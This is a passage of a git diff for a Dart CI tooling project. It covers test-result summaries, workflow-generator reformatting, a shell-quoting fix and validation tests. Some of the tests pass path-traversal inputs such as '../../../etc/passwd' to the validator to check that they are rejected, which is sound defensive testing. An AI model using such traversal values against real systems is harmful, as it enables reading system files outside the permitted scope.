startTime = testStartTimes[id] ?? 0; - final endTime = event['time'] as int? ?? 0; - results.failures.add( - TestFailure( - name: testNames[id] ?? 'unknown', - error: testErrors[id]?.toString() ?? '', - stackTrace: testStackTraces[id]?.toString() ?? '', - printOutput: testPrints[id]?.toString() ?? '', - durationMs: endTime - startTime, - ), - ); - } - - case 'error': - final id = event['testID'] as int?; - if (id == null) break; - // Accumulate multiple errors per test (e.g. test failure + tearDown exception) - testErrors.putIfAbsent(id, () => StringBuffer()); - if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); - testErrors[id]!.write(event['error'] as String? ?? ''); - testStackTraces.putIfAbsent(id, () => StringBuffer()); - if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); - testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); - - case 'print': - final id = event['testID'] as int?; - if (id == null) break; - final message = event['message'] as String? ?? ''; - testPrints.putIfAbsent(id, () => StringBuffer()); - testPrints[id]!.writeln(message); - - case 'done': - final time = event['time'] as int? ?? 0; - results.totalDurationMs = time; - } - } catch (e) { - // Skip malformed JSON lines but continue parsing the rest - Logger.warn('Skipping malformed JSON line: $e'); - } - } - - return results; -} - -/// Choose a code fence delimiter that does not appear in [content]. -String _codeFence(String content) { - var fence = '```'; - while (content.contains(fence)) { - fence += '`'; - } - return fence; -} - -/// Generate a rich GitHub Actions job summary from parsed test results. -/// -/// Writes to $GITHUB_STEP_SUMMARY when running in CI. Platform identifier -/// and failure names are HTML-escaped for safe embedding. -void writeTestJobSummary(TestResults results, int exitCode, String logDir) { - final buf = StringBuffer(); - - // Determine platform identifier for the heading (HTML-escaped for safe embedding) - final platformId = - Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; - - buf.writeln('## Test Results — ${StepSummary.escapeHtml(platformId)}'); - buf.writeln(); - - if (!results.parsed) { - // Fallback: no JSON file was produced (test binary crashed before writing) - final status = exitCode == 0 ? 'passed' : 'failed'; - final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; - buf.writeln('> [!$icon]'); - buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); - buf.writeln(); - buf.writeln('Check the expanded output in test logs for details.'); - buf.writeln(); - buf.writeln(StepSummary.artifactLink(':package: View full test logs')); - StepSummary.write(buf.toString()); - return; - } - - final total = results.passed + results.failed + results.skipped; - final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); - - // Status banner — alert box lines must all be prefixed with > - if (results.failed == 0) { - buf.writeln('> [!NOTE]'); - buf.writeln('> All $total tests passed in ${durationSec}s'); - } else { - buf.writeln('> [!CAUTION]'); - buf.writeln('> ${results.failed} of $total tests failed'); - } - buf.writeln(); - - // Summary table - buf.writeln('| Status | Count |'); - buf.writeln('|--------|------:|'); - buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); - buf.writeln('| :x: Failed | ${results.failed} |'); - buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); - buf.writeln('| **Total** | **$total** |'); - buf.writeln('| **Duration** | **${durationSec}s** |'); - buf.writeln(); - - // Failed test details - if (results.failures.isNotEmpty) { - buf.writeln('### Failed Tests'); - buf.writeln(); - - // Cap at 20 failures to avoid exceeding the 1 MiB summary limit - final displayFailures = results.failures.take(20).toList(); - for (final f in displayFailures) { - final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; - buf.writeln('
'); - buf.writeln(':x: ${StepSummary.escapeHtml(f.name)}$durStr'); - buf.writeln(); - - if (f.error.isNotEmpty) { - // Truncate very long error messages - final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; - buf.writeln('**Error:**'); - final fence = _codeFence(error); - buf.writeln(fence); - buf.writeln(error); - buf.writeln(fence); - buf.writeln(); - } - - if (f.stackTrace.isNotEmpty) { - // Truncate very long stack traces - final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; - buf.writeln('**Stack Trace:**'); - final fence = _codeFence(stack); - buf.writeln(fence); - buf.writeln(stack); - buf.writeln(fence); - buf.writeln(); - } - - if (f.printOutput.isNotEmpty) { - final trimmed = f.printOutput.trimRight(); - final lineCount = trimmed.split('\n').length; - // Truncate captured output if it's very long - final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; - buf.writeln('**Captured Output ($lineCount lines):**'); - final fence = _codeFence(printPreview); - buf.writeln(fence); - buf.writeln(printPreview); - buf.writeln(fence); - buf.writeln(); - } - - buf.writeln('
'); - buf.writeln(); - } - - if (results.failures.length > 20) { - buf.writeln( - '_...and ${results.failures.length - 20} more failures. ' - 'See test logs artifact for full details._', - ); - buf.writeln(); - } - } - - // Artifact link - buf.writeln('---'); - buf.writeln(StepSummary.artifactLink(':package: View full test logs')); - buf.writeln(); - - StepSummary.write(buf.toString()); -} diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index 5b8396f..26208a3 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -12,7 +12,11 @@ class _PlatformDefinition { final String arch; // x64 | arm64 final String runner; // default `runs-on:` label - const _PlatformDefinition({required this.osFamily, required this.arch, required this.runner}); + const _PlatformDefinition({ + required this.osFamily, + required this.arch, + required this.runner, + }); } /// Maps platform identifiers to their default runner label + metadata. @@ -21,8 +25,16 @@ class _PlatformDefinition { /// `ci.runner_overrides: { "": "" }` const _platformDefinitions = { // Linux — org-managed runners - 'ubuntu': _PlatformDefinition(osFamily: 'linux', arch: 'x64', runner: 'runtime-ubuntu-24.04-x64-256gb-64core'), - 'ubuntu-x64': _PlatformDefinition(osFamily: 'linux', arch: 'x64', runner: 'runtime-ubuntu-24.04-x64-256gb-64core'), + 'ubuntu': _PlatformDefinition( + osFamily: 'linux', + arch: 'x64', + runner: 'runtime-ubuntu-24.04-x64-256gb-64core', + ), + 'ubuntu-x64': _PlatformDefinition( + osFamily: 'linux', + arch: 'x64', + runner: 'runtime-ubuntu-24.04-x64-256gb-64core', + ), 'ubuntu-arm64': _PlatformDefinition( osFamily: 'linux', arch: 'arm64', @@ -30,13 +42,33 @@ const _platformDefinitions = { ), // macOS — standard GitHub-hosted runners (no org-managed equivalents) - 'macos': _PlatformDefinition(osFamily: 'macos', arch: 'arm64', runner: 'macos-latest'), - 'macos-arm64': _PlatformDefinition(osFamily: 'macos', arch: 'arm64', runner: 'macos-latest'), - 'macos-x64': _PlatformDefinition(osFamily: 'macos', arch: 'x64', runner: 'macos-15-large'), + 'macos': _PlatformDefinition( + osFamily: 'macos', + arch: 'arm64', + runner: 'macos-latest', + ), + 'macos-arm64': _PlatformDefinition( + osFamily: 'macos', + arch: 'arm64', + runner: 'macos-latest', + ), + 'macos-x64': _PlatformDefinition( + osFamily: 'macos', + arch: 'x64', + runner: 'macos-15-large', + ), // Windows — org-managed runners - 'windows': _PlatformDefinition(osFamily: 'windows', arch: 'x64', runner: 'runtime-windows-2025-x64-256gb-64core'), - 'windows-x64': _PlatformDefinition(osFamily: 'windows', arch: 'x64', runner: 'runtime-windows-2025-x64-256gb-64core'), + 'windows': _PlatformDefinition( + osFamily: 'windows', + arch: 'x64', + runner: 'runtime-windows-2025-x64-256gb-64core', + ), + 'windows-x64': _PlatformDefinition( + osFamily: 'windows', + arch: 'x64', + runner: 'runtime-windows-2025-x64-256gb-64core', + ), 'windows-arm64': _PlatformDefinition( osFamily: 'windows', arch: 'arm64', @@ -74,7 +106,9 @@ class WorkflowGenerator { WorkflowGenerator({required this.ciConfig, required this.toolingVersion}); /// Returns the web_test config map if present and valid; otherwise null. - static Map? _getWebTestConfig(Map ciConfig) { + static Map? _getWebTestConfig( + Map ciConfig, + ) { final raw = ciConfig['web_test']; return raw is Map ? raw : null; } @@ -96,7 +130,9 @@ class WorkflowGenerator { final ci = config['ci']; if (ci == null) return null; if (ci is! Map) { - throw StateError('Expected "ci" in $configPath to be an object, got ${ci.runtimeType}'); + throw StateError( + 'Expected "ci" in $configPath to be an object, got ${ci.runtimeType}', + ); } return ci; } @@ -110,10 +146,14 @@ class WorkflowGenerator { String render({String? existingContent}) { final errors = validate(ciConfig); if (errors.isNotEmpty) { - throw StateError('Cannot render with invalid config:\n ${errors.join('\n ')}'); + throw StateError( + 'Cannot render with invalid config:\n ${errors.join('\n ')}', + ); } - final skeletonPath = TemplateResolver.resolveTemplatePath('github/workflows/ci.skeleton.yaml'); + final skeletonPath = TemplateResolver.resolveTemplatePath( + 'github/workflows/ci.skeleton.yaml', + ); final skeletonFile = File(skeletonPath); if (!skeletonFile.existsSync()) { throw StateError('CI skeleton template not found at $skeletonPath'); @@ -136,14 +176,19 @@ class WorkflowGenerator { Map _buildContext() { final features = ciConfig['features'] as Map? ?? {}; final secretsRaw = ciConfig['secrets']; - final secrets = secretsRaw is Map ? secretsRaw : {}; + final secrets = secretsRaw is Map + ? secretsRaw + : {}; final subPackages = ciConfig['sub_packages'] as List? ?? []; // Build secrets list for env block (skip non-string values) final secretsList = >[]; for (final entry in secrets.entries) { if (entry.value is String) { - secretsList.add({'env_name': entry.key, 'secret_name': entry.value as String}); + secretsList.add({ + 'env_name': entry.key, + 'secret_name': entry.value as String, + }); } } @@ -159,7 +204,9 @@ class WorkflowGenerator { final isMultiPlatform = platforms.length > 1; final runnerOverridesRaw = ciConfig['runner_overrides']; - final runnerOverrides = runnerOverridesRaw is Map ? runnerOverridesRaw : {}; + final runnerOverrides = runnerOverridesRaw is Map + ? runnerOverridesRaw + : {}; String resolveRunner(String platformId) { final override = runnerOverrides[platformId]; if (override is String && override.trim().isNotEmpty) { @@ -184,7 +231,8 @@ class WorkflowGenerator { 'tooling_version': toolingVersion, 'dart_sdk': ciConfig['dart_sdk'] ?? '3.9.2', 'line_length': '${ciConfig['line_length'] ?? 120}', - 'pat_secret': ciConfig['personal_access_token_secret'] as String? ?? 'GITHUB_TOKEN', + 'pat_secret': + ciConfig['personal_access_token_secret'] as String? ?? 'GITHUB_TOKEN', // Feature flags 'proto': features['proto'] == true, @@ -197,9 +245,14 @@ class WorkflowGenerator { 'web_test': features['web_test'] == true, // Web test config (only computed when web_test is true) - 'web_test_concurrency': features['web_test'] == true ? _resolveWebTestConcurrency(ciConfig) : '1', - 'web_test_paths': features['web_test'] == true ? _resolveWebTestPaths(ciConfig) : '', - 'web_test_has_paths': features['web_test'] == true && _resolveWebTestHasPaths(ciConfig), + 'web_test_concurrency': features['web_test'] == true + ? _resolveWebTestConcurrency(ciConfig) + : '1', + 'web_test_paths': features['web_test'] == true + ? _resolveWebTestPaths(ciConfig) + : '', + 'web_test_has_paths': + features['web_test'] == true && _resolveWebTestHasPaths(ciConfig), // Secrets / env 'has_secrets': secretsList.isNotEmpty, @@ -237,7 +290,11 @@ class WorkflowGenerator { if (webTestConfig != null) { final paths = webTestConfig['paths']; if (paths is List && paths.isNotEmpty) { - return paths.whereType().where((s) => s.trim().isNotEmpty).map((s) => p.posix.normalize(s)).toList(); + return paths + .whereType() + .where((s) => s.trim().isNotEmpty) + .map((s) => p.posix.normalize(s)) + .toList(); } } return const []; @@ -248,7 +305,11 @@ class WorkflowGenerator { if (filtered.isEmpty) return ''; // Shell-quote each path for defense-in-depth (validation already blocks // dangerous characters, but quoting prevents breakage from future changes). - return filtered.map((s) => "'$s'").join(' '); + return filtered.map(_shellQuote).join(' '); + } + + static String _shellQuote(String value) { + return "'${value.replaceAll("'", "'\"'\"'")}'"; } static bool _resolveWebTestHasPaths(Map ciConfig) { @@ -267,7 +328,10 @@ class WorkflowGenerator { existing = existing.replaceAll('\r\n', '\n'); rendered = rendered.replaceAll('\r\n', '\n'); - final sectionPattern = RegExp(r'# --- BEGIN USER: (\S+) ---\n(.*?)# --- END USER: \1 ---', dotAll: true); + final sectionPattern = RegExp( + r'# --- BEGIN USER: (\S+) ---\n(.*?)# --- END USER: \1 ---', + dotAll: true, + ); // Extract user content from existing file final userSections = {}; @@ -285,8 +349,10 @@ class WorkflowGenerator { // Replace empty user sections in rendered output with preserved content var result = rendered; for (final entry in userSections.entries) { - final emptyPattern = '# --- BEGIN USER: ${entry.key} ---\n# --- END USER: ${entry.key} ---'; - final replacement = '# --- BEGIN USER: ${entry.key} ---\n${entry.value}# --- END USER: ${entry.key} ---'; + final emptyPattern = + '# --- BEGIN USER: ${entry.key} ---\n# --- END USER: ${entry.key} ---'; + final replacement = + '# --- BEGIN USER: ${entry.key} ---\n${entry.value}# --- END USER: ${entry.key} ---'; result = result.replaceFirst(emptyPattern, replacement); } @@ -311,10 +377,15 @@ class WorkflowGenerator { errors.add('ci.dart_sdk must not contain newlines/tabs'); } else { // dart-lang/setup-dart accepts semver versions or channels like stable/beta/dev. - final isChannel = trimmed == 'stable' || trimmed == 'beta' || trimmed == 'dev'; - final isSemver = RegExp(r'^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$').hasMatch(trimmed); + final isChannel = + trimmed == 'stable' || trimmed == 'beta' || trimmed == 'dev'; + final isSemver = RegExp( + r'^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$', + ).hasMatch(trimmed); if (!isChannel && !isSemver) { - errors.add('ci.dart_sdk must be a Dart SDK channel (stable|beta|dev) or a version like 3.9.2, got "$sdk"'); + errors.add( + 'ci.dart_sdk must be a Dart SDK channel (stable|beta|dev) or a version like 3.9.2, got "$sdk"', + ); } } } @@ -328,14 +399,18 @@ class WorkflowGenerator { final key = entry.key; final value = entry.value; if (key is! String) { - errors.add('ci.features keys must be strings, got ${key.runtimeType}'); + errors.add( + 'ci.features keys must be strings, got ${key.runtimeType}', + ); continue; } if (!_knownFeatureKeys.contains(key)) { errors.add('ci.features contains unknown key "$key" (typo?)'); } if (value is! bool) { - errors.add('ci.features["$key"] must be a bool, got ${value.runtimeType}'); + errors.add( + 'ci.features["$key"] must be a bool, got ${value.runtimeType}', + ); } } } @@ -349,12 +424,16 @@ class WorkflowGenerator { } final lineLength = ciConfig['line_length']; if (lineLength != null && lineLength is! int && lineLength is! String) { - errors.add('ci.line_length must be a number or string, got ${lineLength.runtimeType}'); + errors.add( + 'ci.line_length must be a number or string, got ${lineLength.runtimeType}', + ); } final platforms = ciConfig['platforms']; if (platforms != null) { if (platforms is! List) { - errors.add('ci.platforms must be an array, got ${platforms.runtimeType}'); + errors.add( + 'ci.platforms must be an array, got ${platforms.runtimeType}', + ); } else { for (final p in platforms) { if (p is! String || !_platformDefinitions.containsKey(p)) { @@ -372,13 +451,17 @@ class WorkflowGenerator { final subPackages = ciConfig['sub_packages']; if (subPackages != null) { if (subPackages is! List) { - errors.add('ci.sub_packages must be an array, got ${subPackages.runtimeType}'); + errors.add( + 'ci.sub_packages must be an array, got ${subPackages.runtimeType}', + ); } else { final seenNames = {}; final seenPaths = {}; for (final sp in subPackages) { if (sp is! Map) { - errors.add('ci.sub_packages entries must be objects, got ${sp.runtimeType}'); + errors.add( + 'ci.sub_packages entries must be objects, got ${sp.runtimeType}', + ); continue; } final name = sp['name']; @@ -399,20 +482,28 @@ class WorkflowGenerator { continue; } if (pathValue.contains(RegExp(r'[\r\n\t]'))) { - errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must not contain newlines/tabs'); + errors.add( + 'ci.sub_packages["${name is String ? name : '?'}"].path must not contain newlines/tabs', + ); continue; } if (p.isAbsolute(pathValue) || pathValue.startsWith('~')) { - errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must be a relative repo path'); + errors.add( + 'ci.sub_packages["${name is String ? name : '?'}"].path must be a relative repo path', + ); continue; } if (pathValue.contains('\\')) { - errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must use forward slashes (/)'); + errors.add( + 'ci.sub_packages["${name is String ? name : '?'}"].path must use forward slashes (/)', + ); continue; } final normalized = p.posix.normalize(pathValue); if (normalized.startsWith('..') || normalized.contains('/../')) { - errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must not traverse outside the repo'); + errors.add( + 'ci.sub_packages["${name is String ? name : '?'}"].path must not traverse outside the repo', + ); continue; } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { @@ -431,7 +522,9 @@ class WorkflowGenerator { final runnerOverrides = ciConfig['runner_overrides']; if (runnerOverrides != null) { if (runnerOverrides is! Map) { - errors.add('ci.runner_overrides must be an object, got ${runnerOverrides.runtimeType}'); + errors.add( + 'ci.runner_overrides must be an object, got ${runnerOverrides.runtimeType}', + ); } else { for (final entry in runnerOverrides.entries) { final key = entry.key; @@ -444,7 +537,9 @@ class WorkflowGenerator { continue; } if (value is! String || value.trim().isEmpty) { - errors.add('ci.runner_overrides["$key"] must be a non-empty string'); + errors.add( + 'ci.runner_overrides["$key"] must be a non-empty string', + ); } } } @@ -453,7 +548,9 @@ class WorkflowGenerator { final webTestConfig = ciConfig['web_test']; if (webTestConfig != null) { if (webTestConfig is! Map) { - errors.add('ci.web_test must be an object, got ${webTestConfig.runtimeType}'); + errors.add( + 'ci.web_test must be an object, got ${webTestConfig.runtimeType}', + ); } else { // Detect unknown keys inside web_test config for (final key in webTestConfig.keys) { @@ -465,16 +562,22 @@ class WorkflowGenerator { final concurrency = webTestConfig['concurrency']; if (concurrency != null) { if (concurrency is! int) { - errors.add('ci.web_test.concurrency must be an integer, got ${concurrency.runtimeType}'); + errors.add( + 'ci.web_test.concurrency must be an integer, got ${concurrency.runtimeType}', + ); } else if (concurrency < 1 || concurrency > 32) { - errors.add('ci.web_test.concurrency must be between 1 and 32, got $concurrency'); + errors.add( + 'ci.web_test.concurrency must be between 1 and 32, got $concurrency', + ); } } final paths = webTestConfig['paths']; if (paths != null) { if (paths is! List) { - errors.add('ci.web_test.paths must be an array, got ${paths.runtimeType}'); + errors.add( + 'ci.web_test.paths must be an array, got ${paths.runtimeType}', + ); } else { final seenPaths = {}; for (var i = 0; i < paths.length; i++) { @@ -484,32 +587,46 @@ class WorkflowGenerator { continue; } if (pathValue != pathValue.trim()) { - errors.add('ci.web_test.paths[$i] must not have leading/trailing whitespace'); + errors.add( + 'ci.web_test.paths[$i] must not have leading/trailing whitespace', + ); continue; } if (pathValue.contains(RegExp(r'[\r\n\t]'))) { - errors.add('ci.web_test.paths[$i] must not contain newlines/tabs'); + errors.add( + 'ci.web_test.paths[$i] must not contain newlines/tabs', + ); continue; } if (p.isAbsolute(pathValue) || pathValue.startsWith('~')) { - errors.add('ci.web_test.paths[$i] must be a relative repo path'); + errors.add( + 'ci.web_test.paths[$i] must be a relative repo path', + ); continue; } if (pathValue.contains('\\')) { - errors.add('ci.web_test.paths[$i] must use forward slashes (/)'); + errors.add( + 'ci.web_test.paths[$i] must use forward slashes (/)', + ); continue; } final normalized = p.posix.normalize(pathValue); if (normalized.startsWith('..') || normalized.contains('/../')) { - errors.add('ci.web_test.paths[$i] must not traverse outside the repo'); + errors.add( + 'ci.web_test.paths[$i] must not traverse outside the repo', + ); continue; } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { - errors.add('ci.web_test.paths[$i] contains unsupported characters: "$pathValue"'); + errors.add( + 'ci.web_test.paths[$i] contains unsupported characters: "$pathValue"', + ); continue; } if (!seenPaths.add(normalized)) { - errors.add('ci.web_test.paths contains duplicate path "$normalized"'); + errors.add( + 'ci.web_test.paths contains duplicate path "$normalized"', + ); } } } @@ -523,7 +640,9 @@ class WorkflowGenerator { if (features is Map) { final webTestEnabled = features['web_test'] == true; if (!webTestEnabled && webTestConfig is Map && webTestConfig.isNotEmpty) { - errors.add('ci.web_test config is present but ci.features.web_test is not enabled (dead config?)'); + errors.add( + 'ci.web_test config is present but ci.features.web_test is not enabled (dead config?)', + ); } } @@ -542,7 +661,10 @@ class WorkflowGenerator { Logger.info(' PAT secret: ${ciConfig['personal_access_token_secret']}'); Logger.info(' Platforms: ${platforms.join(', ')}'); - final enabledFeatures = features.entries.where((e) => e.value == true).map((e) => e.key).toList(); + final enabledFeatures = features.entries + .where((e) => e.value == true) + .map((e) => e.key) + .toList(); if (enabledFeatures.isNotEmpty) { Logger.info(' Features: ${enabledFeatures.join(', ')}'); } else { @@ -551,10 +673,16 @@ class WorkflowGenerator { if (features['web_test'] == true) { final wtConfig = ciConfig['web_test']; - final wtMap = wtConfig is Map ? wtConfig : {}; - final concurrency = wtMap['concurrency'] is int ? wtMap['concurrency'] : 1; + final wtMap = wtConfig is Map + ? wtConfig + : {}; + final concurrency = wtMap['concurrency'] is int + ? wtMap['concurrency'] + : 1; final webPaths = wtMap['paths'] is List ? wtMap['paths'] as List : []; - Logger.info(' Web test: concurrency=$concurrency, paths=${webPaths.isEmpty ? "(all)" : webPaths.join(", ")}'); + Logger.info( + ' Web test: concurrency=$concurrency, paths=${webPaths.isEmpty ? "(all)" : webPaths.join(", ")}', + ); } if (secrets.isNotEmpty) { diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index b210259..52640f1 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -451,7 +451,7 @@ jobs: <%/multi_platform%> <%#web_test%> web-test: - needs: [pre-check<%#format_check%>, auto-format<%/format_check%>] + needs: [pre-check<%#format_check%>, auto-format<%/format_check%><%#single_platform%>, analyze-and-test<%/single_platform%><%#multi_platform%>, analyze<%/multi_platform%>] if: needs.pre-check.outputs.should_run == 'true' runs-on: ubuntu-latest <%#has_secrets%> @@ -515,6 +515,12 @@ jobs: run: dart run build_runner build --delete-conflicting-outputs <%/build_runner%> + # ── shared:proto-verify ── keep in sync with single_platform / multi_platform analyze ── +<%#proto%> + - name: Verify proto files + run: dart run runtime_ci_tooling:manage_cicd verify-protos + +<%/proto%> - name: Setup Chrome id: setup-chrome uses: browser-actions/setup-chrome@v2 diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index ee04688..7dbb9f9 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -38,7 +38,9 @@ void main() { // ---- dart_sdk ---- group('dart_sdk', () { test('missing dart_sdk produces error', () { - final errors = WorkflowGenerator.validate({'features': {}}); + final errors = WorkflowGenerator.validate({ + 'features': {}, + }); expect(errors, contains('ci.dart_sdk is required')); }); @@ -92,32 +94,43 @@ void main() { expect(errors, anyElement(contains('whitespace'))); }); - test('dart_sdk with embedded tab (after trim is identity) triggers newlines/tabs error', () { - // A tab in the middle: trim() has no effect but the regex catches it. - final errors = WorkflowGenerator.validate({ - 'dart_sdk': '3.9\t.2', - 'features': {}, - }); - expect(errors, anyElement(contains('newlines/tabs'))); - }); + test( + 'dart_sdk with embedded tab (after trim is identity) triggers newlines/tabs error', + () { + // A tab in the middle: trim() has no effect but the regex catches it. + final errors = WorkflowGenerator.validate({ + 'dart_sdk': '3.9\t.2', + 'features': {}, + }); + expect(errors, anyElement(contains('newlines/tabs'))); + }, + ); test('valid semver dart_sdk passes', () { - final errors = WorkflowGenerator.validate(_validConfig(dartSdk: '3.9.2')); + final errors = WorkflowGenerator.validate( + _validConfig(dartSdk: '3.9.2'), + ); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); test('valid semver with pre-release passes', () { - final errors = WorkflowGenerator.validate(_validConfig(dartSdk: '3.10.0-beta.1')); + final errors = WorkflowGenerator.validate( + _validConfig(dartSdk: '3.10.0-beta.1'), + ); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); test('channel "stable" passes', () { - final errors = WorkflowGenerator.validate(_validConfig(dartSdk: 'stable')); + final errors = WorkflowGenerator.validate( + _validConfig(dartSdk: 'stable'), + ); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); test('channel "beta" passes', () { - final errors = WorkflowGenerator.validate(_validConfig(dartSdk: 'beta')); + final errors = WorkflowGenerator.validate( + _validConfig(dartSdk: 'beta'), + ); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); @@ -127,7 +140,9 @@ void main() { }); test('invalid dart_sdk like "latest" produces error', () { - final errors = WorkflowGenerator.validate(_validConfig(dartSdk: 'latest')); + final errors = WorkflowGenerator.validate( + _validConfig(dartSdk: 'latest'), + ); expect(errors, anyElement(contains('channel'))); }); @@ -169,18 +184,20 @@ void main() { }); test('all known feature keys pass validation', () { - final errors = WorkflowGenerator.validate(_validConfig( - features: { - 'proto': true, - 'lfs': false, - 'format_check': true, - 'analysis_cache': false, - 'managed_analyze': true, - 'managed_test': false, - 'build_runner': true, - 'web_test': true, - }, - )); + final errors = WorkflowGenerator.validate( + _validConfig( + features: { + 'proto': true, + 'lfs': false, + 'format_check': true, + 'analysis_cache': false, + 'managed_analyze': true, + 'managed_test': false, + 'build_runner': true, + 'web_test': true, + }, + ), + ); expect(errors.where((e) => e.contains('features')), isEmpty); }); @@ -193,12 +210,16 @@ void main() { // ---- platforms ---- group('platforms', () { test('non-list platforms produces error', () { - final errors = WorkflowGenerator.validate(_validConfig(platforms: null)..['platforms'] = 'ubuntu'); + final errors = WorkflowGenerator.validate( + _validConfig(platforms: null)..['platforms'] = 'ubuntu', + ); expect(errors, anyElement(contains('platforms must be an array'))); }); test('unknown platform entry produces error', () { - final errors = WorkflowGenerator.validate(_validConfig(platforms: ['ubuntu', 'solaris'])); + final errors = WorkflowGenerator.validate( + _validConfig(platforms: ['ubuntu', 'solaris']), + ); expect(errors, anyElement(contains('invalid platform "solaris"'))); }); @@ -210,7 +231,9 @@ void main() { }); test('valid single platform passes', () { - final errors = WorkflowGenerator.validate(_validConfig(platforms: ['ubuntu'])); + final errors = WorkflowGenerator.validate( + _validConfig(platforms: ['ubuntu']), + ); expect(errors.where((e) => e.contains('platforms')), isEmpty); }); @@ -265,19 +288,27 @@ void main() { test('valid pat passes', () { final errors = WorkflowGenerator.validate(_validConfig(pat: 'MY_PAT')); - expect(errors.where((e) => e.contains('personal_access_token_secret')), isEmpty); + expect( + errors.where((e) => e.contains('personal_access_token_secret')), + isEmpty, + ); }); test('null pat is fine (optional, defaults to GITHUB_TOKEN)', () { final errors = WorkflowGenerator.validate(_validConfig()); - expect(errors.where((e) => e.contains('personal_access_token_secret')), isEmpty); + expect( + errors.where((e) => e.contains('personal_access_token_secret')), + isEmpty, + ); }); }); // ---- line_length ---- group('line_length', () { test('non-numeric line_length produces error', () { - final errors = WorkflowGenerator.validate(_validConfig(lineLength: true)); + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: true), + ); expect(errors, anyElement(contains('line_length'))); }); @@ -287,7 +318,9 @@ void main() { }); test('string line_length passes', () { - final errors = WorkflowGenerator.validate(_validConfig(lineLength: '120')); + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: '120'), + ); expect(errors.where((e) => e.contains('line_length')), isEmpty); }); @@ -310,154 +343,207 @@ void main() { final errors = WorkflowGenerator.validate( _validConfig(subPackages: ['just_a_string']), ); - expect(errors, anyElement(contains('sub_packages entries must be objects'))); + expect( + errors, + anyElement(contains('sub_packages entries must be objects')), + ); }); test('sub_packages with missing name produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'path': 'packages/foo'}, - ]), + _validConfig( + subPackages: [ + {'path': 'packages/foo'}, + ], + ), ); expect(errors, anyElement(contains('name must be a non-empty string'))); }); test('sub_packages with empty name produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': '', 'path': 'packages/foo'}, - ]), + _validConfig( + subPackages: [ + {'name': '', 'path': 'packages/foo'}, + ], + ), ); expect(errors, anyElement(contains('name must be a non-empty string'))); }); test('sub_packages with missing path produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo'}, + ], + ), ); expect(errors, anyElement(contains('path must be a non-empty string'))); }); test('sub_packages with empty path produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': ''}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': ''}, + ], + ), ); expect(errors, anyElement(contains('path must be a non-empty string'))); }); - test('sub_packages path with directory traversal (..) produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': '../../../etc/passwd'}, - ]), - ); - expect(errors, anyElement(contains('must not traverse outside the repo'))); - }); + test( + 'sub_packages path with directory traversal (..) produces error', + () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': '../../../etc/passwd'}, + ], + ), + ); + expect( + errors, + anyElement(contains('must not traverse outside the repo')), + ); + }, + ); test('sub_packages path with embedded traversal produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': 'packages/../../../etc'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': 'packages/../../../etc'}, + ], + ), + ); + expect( + errors, + anyElement(contains('must not traverse outside the repo')), ); - expect(errors, anyElement(contains('must not traverse outside the repo'))); }); test('sub_packages absolute path produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': '/usr/local/bin'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': '/usr/local/bin'}, + ], + ), ); expect(errors, anyElement(contains('must be a relative repo path'))); }); test('sub_packages path starting with ~ produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': '~/evil'}, - ]), + _validConfig( + subPackages: [ + {'name': 'foo', 'path': '~/evil'}, + ], + ), ); expect(errors, anyElement(contains('must be a relative repo path'))); }); test('sub_packages path with backslashes produces error', () { final errors = WorkflowGenerator.validate( - _validConfig(subPackages: [ - {'name': 'foo', 'path': r'packages\foo'}, - 